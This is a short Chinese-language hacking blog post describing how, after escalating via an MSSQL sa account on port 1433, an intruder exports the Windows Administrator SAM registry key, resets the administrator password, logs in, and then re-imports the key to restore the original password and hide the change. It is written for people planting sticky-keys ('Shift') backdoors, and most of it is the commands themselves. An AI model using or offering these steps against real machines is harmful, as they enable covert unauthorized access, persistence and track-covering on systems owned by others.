巧借Administrator用户登陆

1. sa默认是SYSTEM权限，可以读sam键. 在1433提权中不防一试。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\trace.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\trace.reg
这样就不用克隆，用管理员帐户即可. （非常适用于留Shift后门的朋友）

2. 如果没用默认的administrator，可以用下面的方法找到对应的sid.
regedit /e c:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名

3. 2000系统不存在REG，用Regedit更具有通用性
regedit /e c:\trace.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
regedit要写完整路径，不可以用HKLM代替HKEY_LOCAL_MACHINE
完事后用regedit /s c:\trace.reg恢复原来的键值。

上一篇: 台湾金牌音乐人遭艳照敲诈 黑客侵入电脑
下一篇: attrib指令格式及参数
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志: